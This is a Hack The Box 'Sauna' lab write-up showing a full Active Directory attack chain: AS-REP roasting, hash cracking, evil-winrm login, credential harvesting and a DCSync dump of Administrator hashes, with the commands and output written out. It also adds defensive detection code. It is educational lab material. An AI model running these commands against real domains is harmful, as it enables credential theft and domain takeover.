How Anonymous LDAP Enumeration Led to AS-REP Roasting and Domain Compromise
2026-2-27 04:49:27 Author: infosecwriteups.com

Jabaribrown

As I continue preparing for the CRTP, I’ve begun incorporating external resources beyond the course material to strengthen my understanding of Active Directory (AD) enumeration. My goal is to become comfortable identifying and abusing AD features without relying solely on automated tooling.

Coming from hands-on experience in enterprise AD environments, this shift in perspective has been eye-opening. I’ve had to retrain myself to view Active Directory not as a blue teamer or administrator responsible for maintaining and securing it, but through the lens of a red teamer assessing it for weaknesses and attack paths.

To reinforce this mindset and deepen my technical understanding, I completed and documented a write-up of the Sauna machine on Hack The Box. This exercise is part of my broader effort to solidify core AD attack fundamentals and prepare confidently for the CRTP exam.

After launching Burp Suite and configuring Mozilla Firefox to proxy traffic through it, I navigated to the target IP address. The application loaded successfully, revealing a banking web application interface:

Screenshot: Egotistical Bank web application

Using the Wappalyzer browser extension, I identified that the web server was running Microsoft IIS. Additionally, the response headers and fingerprinting results indicated Windows Server as the underlying operating system:

Screenshot: using Wappalyzer to get more info

During manual content enumeration of the application, I identified an about.html page that publicly listed team members.

Exposed employee names are particularly useful in domain environments, as they provide a basis for constructing probable username formats (e.g., first initial + last name, first.last, etc.), which can later be tested against authentication services during credential-based attacks.


Now that we have an idea of potential users, the next step is to begin enumerating the target’s exposed services. To do this, I used nmap to scan the host and identify open ports and running services.

Understanding what services are accessible will help determine possible attack vectors and guide further enumeration efforts.

Next, I ran an nmap scan against the target IP address (10.129.1.88) to identify which services were currently exposed:

Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-20 17:10 -0500
Nmap scan report for 10.129.1.88
Host is up (0.036s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-21 05:09:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-02-21T05:10:06
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 6h59m16s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.61 seconds

From the nmap scan, a few services immediately stood out — most notably LDAP, along with the domain name set to EGOTISTICAL-BANK.LOCAL.

Earlier, Wappalyzer confirmed that IIS was running, which already suggested a Windows environment. Now, seeing LDAP and a domain name further reinforces that this host is very likely operating within an Active Directory domain — and potentially as a Domain Controller.

To begin enumerating LDAP, I decided to use Windapsearch, a lightweight Python script that allows for querying LDAP from the command line.

The tool can be found here:
https://github.com/ropnop/windapsearch

According to the documentation:

  • You must specify a Domain Controller using --dc-ip, or provide a domain with -d.
  • A valid domain username and password are required for most queries.
  • If no credentials are provided, the script will attempt an anonymous bind and enumerate the default namingContext, but most additional queries will fail.
  • The username must include the full domain (e.g., [email protected] or DOMAIN\user).

Since we do not yet have valid credentials, the first step will be to test whether anonymous bind is allowed and determine how much information we can extract from LDAP without authentication.

jbrown@Jabaris-MacBook-Pro windapsearch % python3 windapsearch.py -d EGOTISTICAL-BANK.LOCAL --dc-ip 10.129.1.88 
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.1.88
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None

[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %

Since I didn’t provide a username or password, the LDAP query failed. Anonymous bind is not allowed on this domain, which means we’ll need valid credentials to enumerate further.

At this point, guessing usernames manually would be inefficient. However, we previously identified a list of team members from the about.html page, which gives us a strong starting point.

To generate possible username formats, I decided to use Username Anarchy, a tool that automatically creates common username permutations from a list of names:

https://github.com/urbanadventurer/username-anarchy

Before running the tool, I first created a text file containing the first and last names of the team members.

Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

using Username Anarchy:

jbrown@Jabaris-MacBook-Pro username-anarchy % ./username-anarchy --input-file ../../sauna/names.txt --select-format first,flast,first.last,firstl > ../../sauna/usernamelist.txt
jbrown@Jabaris-MacBook-Pro username-anarchy % cat ../../sauna/usernamelist.txt
fergus
fergus.smith
ferguss
fsmith
hugo
hugo.bear
hugob
hbear
steven
steven.kerb
stevenk
skerb
shaun
shaun.coins
shaunc
scoins
bowie
bowie.taylor
bowiet
btaylor
sophie
sophie.driver
sophied
sdriver

Now that we have generated a list of potential usernames, we’ve met the conditions to attempt an AS-REP Roasting attack and try to extract a hash from any user account that has preauthentication disabled.

Since we do not yet have valid credentials, AS-REP Roasting is a logical next step. If any account does not require Kerberos preauthentication, we can request a TGT for that user and retrieve a crackable hash without needing a password.

To automate this process, I used a while loop to iterate through the list of generated usernames and check each one against the domain.

jbrown@Jabaris-MacBook-Pro examples % while read p; do python3 GetNPUsers.py EGOTISTICAL-BANK.LOCAL/"$p" -request -no-pass -dc-ip 10.129.1.88  >> ../../../sauna/hash.txt; done < ../../../sauna/usernamelist.txt
jbrown@Jabaris-MacBook-Pro examples % cat ../../../sauna/hash.txt
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for fergus
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for fergus.smith
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for ferguss
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for fsmith
[email protected]:b7f1d6466030efd522417d8a57486c72$81966e323a03529b80b6a903aa45f33fb09a4eedc7bb51ad189cf5132f021be35fe3bb114ba77ae54488ee18421926719a4d4b64f057a9119a75d22a5543d75b41fec6e9dca64cff751a04641a022d5e98612b0e27ebe8ac4ceef01b2aeecc677bae2c31993d3f5865462f6f55c9bedf4b98d2b57aefb8bbb6a88ca07695c8f94d1c768681c72d9ddaddbad79d434c46be11bd4aff206cd91e9179756760e3db6cafa9cdde5a9afb42d7a9366a3d7d47f9fb4a42a550bd44c7369c360a92ae46dba7a4ea343aa499356a399c09771568a2f71be573452cf66ea66372b75a9a41ed2ca2b55f1f410ee7fce71e2dd8c98f8dcc10b2fa2a8041837a80e6f2e8765d
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

I was able to get a password hash for the user fsmith!

[*] Getting TGT for fsmith
[email protected]:b7f1d6466030efd522417d8a57486c72$81966e323a03529b80b6a903aa45f33fb09a4eedc7bb51ad189cf5132f021be35fe3bb114ba77ae54488ee18421926719a4d4b64f057a9119a75d22a5543d75b41fec6e9dca64cff751a04641a022d5e98612b0e27ebe8ac4ceef01b2aeecc677bae2c31993d3f5865462f6f55c9bedf4b98d2b57aefb8bbb6a88ca07695c8f94d1c768681c72d9ddaddbad79d434c46be11bd4aff206cd91e9179756760e3db6cafa9cdde5a9afb42d7a9366a3d7d47f9fb4a42a550bd44c7369c360a92ae46dba7a4ea343aa499356a399c09771568a2f71be573452cf66ea66372b75a9a41ed2ca2b55f1f410ee7fce71e2dd8c98f8dcc10b2fa2a8041837a80e6f2e8765d
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
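The roast loop above has a mirror image on the Domain Controller, and the following Python is an added example (not from the write-up or from Impacket) of what a detection would key on: Security event 4768 entries from one client with Result Code 0x6 for each guessed name that does not exist, and a successful 4768 with Pre-Authentication Type 0 for the account that does. The event records and the client address 10.10.14.5 are constructed for the example; the helper also checks the userAccountControl flag that makes an account roastable in the first place.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# userAccountControl bit UF_DONT_REQUIRE_PREAUTH: set on accounts that will answer an
# AS-REQ without pre-authentication, which is the condition AS-REP Roasting needs.
DONT_REQ_PREAUTH = 0x400000


def is_asrep_roastable(user_account_control: int) -> bool:
    """True when Kerberos pre-authentication is disabled for the account."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


def roasted_accounts(events):
    """Accounts for which a TGT was issued with no pre-authentication (4768,
    Status 0x0, PreAuthType 0). Each such event is an AS-REP handed to whoever asked."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["Status"] == "0x0"
                   and e["PreAuthType"] == 0})


def enumeration_bursts(events, threshold=3, window=timedelta(minutes=5)):
    """Client addresses that caused at least `threshold` 'client not found' TGT
    failures (4768, Status 0x6) inside one sliding window. The while loop in the
    write-up produces exactly this: one 0x6 per guessed username that does not exist.
    Returns {ip: largest burst size seen}."""
    failures = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x6":
            failures[e["IpAddress"]].append(e["Time"])
    bursts = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            size = end - start + 1
            if size >= threshold:
                bursts[ip] = max(bursts.get(ip, 0), size)
    return bursts


def _event(second, user, ip, status, preauth):
    # Constructed 4768 record; field names follow the Windows event schema.
    return {"EventID": 4768, "Time": datetime(2026, 2, 22, 19, 0, second),
            "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth}


# Constructed sample: the first four mirror the loop's output above (three names the
# KDC does not know, then fsmith answered without pre-auth); the last is a normal
# pre-authenticated logon from a different, constructed host address.
SAMPLE_EVENTS = [
    _event(1, "fergus", "10.10.14.5", "0x6", None),
    _event(2, "fergus.smith", "10.10.14.5", "0x6", None),
    _event(3, "ferguss", "10.10.14.5", "0x6", None),
    _event(4, "fsmith", "10.10.14.5", "0x0", 0),
    _event(9, "Administrator", "10.129.1.20", "0x0", 2),
]

if __name__ == "__main__":
    print("roasted:", roasted_accounts(SAMPLE_EVENTS))          # ['fsmith']
    print("bursts:", enumeration_bursts(SAMPLE_EVENTS))          # {'10.10.14.5': 3}
    print("0x410200 roastable:", is_asrep_roastable(0x410200))  # True
```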

Now that we’ve successfully obtained an AS-REP hash, the next step is to attempt an offline brute-force attack to recover the user’s password.

Since AS-REP Roasting provides us with a crackable Kerberos hash, we can use hashcat to perform an offline password attack without interacting with the domain controller further. This is advantageous because it avoids additional authentication attempts that could trigger account lockouts or monitoring alerts.

For Kerberos 5 AS-REP hashes, the correct Hashcat mode is 18200.

jbrown@Jabaris-MacBook-Pro hashcat % ./hashcat -m 18200 ../../sauna/hash.txt ../../wordlist/rockyou.txt --force
Watchdog: Temperature abort trigger set to 100c

Host memory allocated for this attack: 599 MB (1056 MB free)

Dictionary cache built:
* Filename..: ../../wordlist/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Speed.....: 530 MiB/s
* Runtime...: 0.26s

[email protected]:b7f1d6466030efd522417d8a57486c72$81966e323a03529b80b6a903aa45f33fb09a4eedc7bb51ad189cf5132f021be35fe3bb114ba77ae54488ee18421926719a4d4b64f057a9119a75d22a5543d75b41fec6e9dca64cff751a04641a022d5e98612b0e27ebe8ac4ceef01b2aeecc677bae2c31993d3f5865462f6f55c9bedf4b98d2b57aefb8bbb6a88ca07695c8f94d1c768681c72d9ddaddbad79d434c46be11bd4aff206cd91e9179756760e3db6cafa9cdde5a9afb42d7a9366a3d7d47f9fb4a42a550bd44c7369c360a92ae46dba7a4ea343aa499356a399c09771568a2f71be573452cf66ea66372b75a9a41ed2ca2b55f1f410ee7fce71e2dd8c98f8dcc10b2fa2a8041837a80e6f2e8765d:Thestrokes23

Found the password!

Thestrokes23

Looking back at the nmap scan results, we can see that the WinRM service is running on port 5985.

This is important because WinRM (Windows Remote Management) allows for remote command execution over HTTP.

5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Since WinRM is exposed on port 5985, we can use it to attempt authentication with the credentials we harvested from the AS-REP hash.

If the credentials are valid and the user has remote access privileges, this should grant us an interactive shell on the target system. From there, we can begin post-exploitation enumeration and attempt to retrieve the user flag.

To test this, we can use a tool such as evil-winrm to authenticate against the target using the cracked domain credentials:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.1.88 -u fsmith -p 'Thestrokes23'
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents>

/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> dir

Directory: C:\Users\FSmith

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 10:01 AM Desktop
d-r--- 1/24/2020 10:40 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos

*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir

Directory: C:\Users\FSmith\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/22/2026 7:05 PM 34 user.txt

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
*****FLAGFOUNDHERE*******
*Evil-WinRM* PS C:\Users\FSmith\Desktop>

Awesome — after successfully authenticating over WinRM, I was able to retrieve the user flag.

Now it’s time to focus on obtaining the admin flag.


Since we’re officially in the post-exploitation phase, the goal shifts to identifying any vulnerable services, misconfigurations, weak permissions, or privileged accounts that could allow us to escalate our privileges.

To assist with local enumeration, I decided to upload winPEAS, a well-known Windows privilege escalation tool from the PEASS-ng suite:

https://github.com/peass-ng/PEASS-ng

winPEAS automates the process of checking for common privilege escalation vectors such as:

  • Misconfigured services
  • Weak file or folder permissions
  • Stored credentials
  • Registry misconfigurations
  • Token privileges
  • Scheduled tasks
  • And other common Windows escalation paths

By running winPEAS, we can quickly identify potential misconfigurations that may allow us to move from a low-privileged user to SYSTEM or Administrator.

Info: Uploading /Users/jbrown/HTB/tools/PEASS-ng/winPEAS/winPEASps1/winPEAS.ps1 to C:\Users\FSmith\Desktop\winPEAS.ps1
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...

Data: 125744 bytes of 125744 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls

Directory: C:\Users\FSmith\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/22/2026 7:05 PM 34 user.txt
-a---- 2/22/2026 8:02 PM 94310 winPEAS.ps1

*Evil-WinRM* PS C:\Users\FSmith\Desktop>

While reviewing the output from winPEAS, a few interesting findings stood out. Most notably, I was able to identify additional logon credentials associated with this machine.

Discovering stored or cached credentials during post-exploitation is significant, as they may belong to a more privileged account or be reused elsewhere in the environment. At this stage, any credential material is worth investigating further.

=========|| Additonal Winlogon Credentials Check
EGOTISTICALBANK
EGOTISTICALBANK\svc_loanmanager
Moneymakestheworldgoround!

Unfortunately, winPEAS did not reveal any unquoted service path vulnerabilities that would allow us to escalate privileges through the well-known Windows path parsing issue.

Unquoted service path vulnerabilities occur when a service executable path contains spaces and is not enclosed in quotes. Because of how Windows parses file paths, it may attempt to execute a malicious binary placed in a higher-level directory (e.g., C:\Program.exe) before reaching the intended service binary.
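winPEAS could not complete this check here because WMI access was denied, so the following Python is an added example (not from the write-up or from PEASS-ng) of the logic behind it: given a service ImagePath, list the binaries Windows would try before the intended one. The service names and paths are constructed.

```python
import re


def unquoted_path_candidates(image_path: str):
    """Return, in lookup order, the executables Windows would try before the real one
    when a service's ImagePath is unquoted and contains spaces. An empty list means the
    path is quoted, has no spaces in the executable part, or is not an .exe path."""
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []                        # a quoted path is resolved as a single token
    match = re.match(r"(?i)(.*?\.exe)", path)
    if not match:
        return []
    exe_path = match.group(1)            # drop any arguments after the executable
    if " " not in exe_path:
        return []
    parts = exe_path.split(" ")
    # Windows tries each space-delimited prefix with .exe appended: for
    # C:\Program Files\Egotistical Bank\svc.exe that is C:\Program.exe, then
    # C:\Program Files\Egotistical.exe, before reaching the intended binary.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_services(services):
    """services: {name: ImagePath}. Returns {name: candidates} for every service whose
    path would be hijackable if one of the candidate directories were writable by a
    low-privileged user; fixing it is simply quoting the path."""
    return {name: cands for name, path in services.items()
            if (cands := unquoted_path_candidates(path))}


# Constructed service table: one unquoted path with spaces, one quoted path with
# spaces, and two system paths whose spaces (if any) sit only in the arguments.
SAMPLE_SERVICES = {
    "LoanSvc": r"C:\Program Files\Egotistical Bank\LoanSvc\loan.exe -start",
    "BackupTool": r'"C:\Program Files\Backup Tool\bk.exe" -quiet',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "NetSvc": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
}

if __name__ == "__main__":
    for name, cands in audit_services(SAMPLE_SERVICES).items():
        print(name, "->", cands)   # LoanSvc -> ['C:\\Program.exe', 'C:\\Program Files\\Egotistical.exe']
```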


=========|| SERVICE path vulnerable check
Checking for vulnerable service .exe
Access denied
At C:\Users\FSmith\Desktop\winPEAS.ps1:1314 char:1
+ Get-WmiObject Win32_Service | Where-Object { $_.PathName -like '*.exe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

=========|| Checking for Unquoted Service Paths
Fetching the list of services, this may take a while...
Access denied
At C:\Users\FSmith\Desktop\winPEAS.ps1:119 char:15
+ $services = Get-WmiObject -Class Win32_Service |
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
No unquoted service paths were found

Going through the large winPEAS output, one finding stood out. To validate whether this account actually exists on the system and isn’t just a reference, I decided to check the C:\Users\ directory.

If the account has a profile directory present, it confirms that the user has logged onto the machine at some point. This can help us determine whether the credentials we found belong to a legitimate local or domain account and whether they might be useful for privilege escalation or lateral movement:

/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir C:\Users

Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr

*Evil-WinRM* PS C:\Users\FSmith\Documents>

Now that we’ve confirmed the account exists on the system, we can attempt to authenticate as svc_loanmgr using the credentials we discovered:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.4.62 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

Now that we have access to a more privileged account, let’s use BloodHound to get a visual mapping of the banking domain. This allows us to clearly see relationships between users, groups, computers, and permissions, and helps identify potential privilege escalation paths that may not be obvious from manual enumeration alone.

By collecting domain data and importing it into BloodHound, we can analyze:

  • Group memberships
  • Delegated permissions
  • Overly permissive ACLs
  • Attack paths to high-value targets such as Domain Admins

This visualization makes it much easier to spot misconfigurations or privilege chains that we can exploit.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Expand-Archive -Path sharphound-v2.9.0.zip
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> dir

Directory: C:\Users\svc_loanmgr\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2026 1:09 AM sharphound-v2.9.0
-a---- 2/23/2026 1:08 AM 2465361 sharphound-v2.9.0.zip
-a---- 2/23/2026 1:05 AM 1618189 SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> cd sharphound-v2.9.0
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> dir

Directory: C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/16/2026 6:40 PM 1318912 SharpHound.exe
-a---- 1/16/2026 6:40 PM 553 SharpHound.exe.config
-a---- 1/16/2026 6:40 PM 235008 SharpHound.pdb
-a---- 1/16/2026 6:40 PM 1618189 SharpHound.ps1

Run the collector:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> ./SharpHound.exe
2026-02-23T01:10:01.9369849-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-02-23T01:10:01.9838795-08:00|INFORMATION|SharpHound Version: 2.9.0.0
2026-02-23T01:10:01.9838795-08:00|INFORMATION|SharpHound Common Version: 4.5.2.0
2026-02-23T01:10:02.1713577-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2026-02-23T01:10:02.2651250-08:00|INFORMATION|Initializing SharpHound at 1:10 AM on 2/23/2026
2026-02-23T01:10:02.4213649-08:00|INFORMATION|Resolved current domain to EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:02.7338588-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2026-02-23T01:10:02.8901287-08:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:02.9057441-08:00|INFORMATION|Collecting AdminSDHolder data for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.0307390-08:00|INFORMATION|AdminSDHolder ACL hash 00282C4ECB176A3D401881255CEFB538664FC932 calculated for EGOTISTICAL-BANK.LOCAL.
2026-02-23T01:10:03.2026022-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8744850-08:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL Configuration NC
2026-02-23T01:10:04.1557346-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:05.6401074-08:00|INFORMATION|Producer has finished, closing LDAP channel
2026-02-23T01:10:05.6401074-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-02-23T01:10:06.1245461-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-02-23T01:10:06.1557387-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-02-23T01:10:06.3120870-08:00|INFORMATION|Status: 297 objects finished (+297 99)/s -- Using 58 MB RAM
2026-02-23T01:10:06.3276178-08:00|INFORMATION|Enumeration finished in 00:00:03.4496146
2026-02-23T01:10:06.4526159-08:00|INFORMATION|Saving cache with stats: 16 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2026-02-23T01:10:06.4994897-08:00|INFORMATION|SharpHound Enumeration Completed at 1:10 AM on 2/23/2026! Happy Graphing!

Download the zip file:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> download 20260223011005_BloodHound.zip

Info: Downloading C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0\20260223011005_BloodHound.zip to 20260223011005_BloodHound.zip
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...

Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0>

Then upload the zip file into BloodHound.

Screenshot: uploading the zip file

To identify users with DCSync rights, we can use a BloodHound query. DCSync privileges allow an account to simulate the Domain Controller and request password hashes for other users — a high-value escalation vector.

In BloodHound, this query is expressed in Cypher and will return all accounts that have the ability to perform a DCSync attack:

MATCH p=()-[:GetChanges|GetChangesAll|GetChangesInFilteredSet]->(:Domain) Return p

Screenshot: checking to see what users have DCSync rights

Now that we’ve identified an account with DCSync privileges, we can leverage this to dump password hashes directly from the Domain Controller.

To do this, we can use secretsdump.py from the Impacket suite. Since DCSync rights allow us to replicate directory data, we can request the NTLM hashes for high-value accounts — including the Administrator account.

jbrown@Jabaris-MacBook-Pro examples % python3 secretsdump.py egotistical-bank/[email protected] -just-dc-user Administrator
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...
jbrown@Jabaris-MacBook-Pro examples %
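Two defender-side views of the DCSync right used above, as an added Python example (not from the write-up, BloodHound or Impacket): the first narrows the Cypher query's result to principals that hold both GetChanges and GetChangesAll on the domain, which is what a full replication request needs; the second flags Security event 4662 entries whose Properties carry the replication control-access GUIDs when the requester is not a Domain Controller computer account. The edges are constructed to match the write-up's outcome (svc_loanmgr can DCSync, SAUNA$ is the DC), the HYPOTHETICAL_SYNC account and the 4662 records are constructed, and the non-replication GUID is a placeholder.

```python
# DS-Replication control-access right GUIDs, as they appear both in the ACE on the
# domain object and in the Properties field of Security event 4662.
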